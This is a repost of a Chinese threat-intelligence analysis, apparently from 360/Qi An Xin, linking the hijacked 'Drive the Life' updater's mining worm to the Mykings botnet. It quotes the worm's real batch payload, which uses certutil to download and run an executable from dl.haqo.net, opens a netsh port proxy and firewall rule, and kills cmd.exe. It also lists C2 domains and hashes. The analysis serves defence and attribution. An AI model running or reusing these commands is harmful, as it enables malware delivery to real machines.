当前位置:网站首页 > 网络安全培训 > 正文

同一团伙还是栽赃嫁祸? - “驱动人生”劫持事件与Mykings家族活动的关联分析

freebuffreebuf 2019-01-29 303 0

本文来源:奇安信威胁情报中心

背景

近期360威胁情报中心发现劫持“驱动人生”的挖矿蠕虫再次活跃并做出了预警(详情可以参见《各大安全厂商曝光该攻击,攻击逐步停止。


2018年12月27日

永恒之蓝攻击模块攻击成功后在目标机器上运行的bat的内容变更下一阶段的payload地址

http://dl.haqo.net/dl.exe改成了http://dl.haqo.net/dll.exe

     certutil-urlcache -split -f http://dl.haqo.net/dll.exec:\installs.exe

netshinterface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1connectport=53

netshfirewall add portopening tcp 65532 DNS2

c:\windows\temp\cm.exe/c c:\installs.exe

taskkill/F /IM cmd.exe

而该地址下载回来的样本(f9144118127ff29d4a49a30b242ceb55)的C2地址为以下3个,增加了http://img.minicen.ga/i.png,而该域名为免费域名,注册地址为:freenom.com


image.png


2019年1月23日

http://dl.haqo.net/dll.exe的地址的样本变为:

59b18d6146a2aa066f661599c496090d,下图为该样本的传播量:

image.png


   该样本的C2地址变为下图的3个域名,增加了o.beahh.com:


image.png


   其中 beahh.com域名是2019年1月16日刚注册的。


image.png


image.png

总结

         360威胁情报中心基于自有的大数据和威胁情报平台对入侵驱动人生的幕后团伙进行了关联分析,发现其所用的IP与Mykings事件团伙的部分IP重合,并且使用时间的段重合,甚至连样本所访问的URL格式、端口都一样。但是两个团伙已知的恶意代码没有太多的相似之处,格式高度一致的URL没有实际上的请求和响应数据,由于VT不可靠的URL检测机制,该URL是否实际存在也是个疑问。

基于看到的事实,有两个猜想值得关注:1、入侵“驱动人生”的幕后黑手与Mykings事件团伙存在联系,甚至可能是同一个团伙。2、“驱动人生”木马的团伙在有意识地积极栽赃嫁祸给Mykings团伙。我们的观点倾向于后者,360威胁情报中心会持续保持跟踪,基于新发现的事实调整自己的看法,也希望安全业界分享自己的发现。

 

参考

360对劫持“驱动人生”的挖矿蠕虫分析报告系列详情如下表:

分析文章标题发布日期分析团队
《利用“驱动人生”升级程序的恶意程序预警》2018.12.15360互联网安全中心
《驱动人生旗下应用分发恶意代码事件分析 - 一个供应链攻击的案例》2018.12.17360威胁情报中心
《警报!“永恒之蓝”下载器木马再度更新!》2018.12.19360安全卫士
《劫持“驱动人生”的挖矿蠕虫再次活跃》2019.01.24360威胁情报中心
《MyKings: 一个大规模多重僵尸网络》2018.01.24360网络安全研究院

 

转载请注明来自网盾网络安全培训,本文标题:《同一团伙还是栽赃嫁祸? - “驱动人生”劫持事件与Mykings家族活动的关联分析》

标签:MyKings驱动人生

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表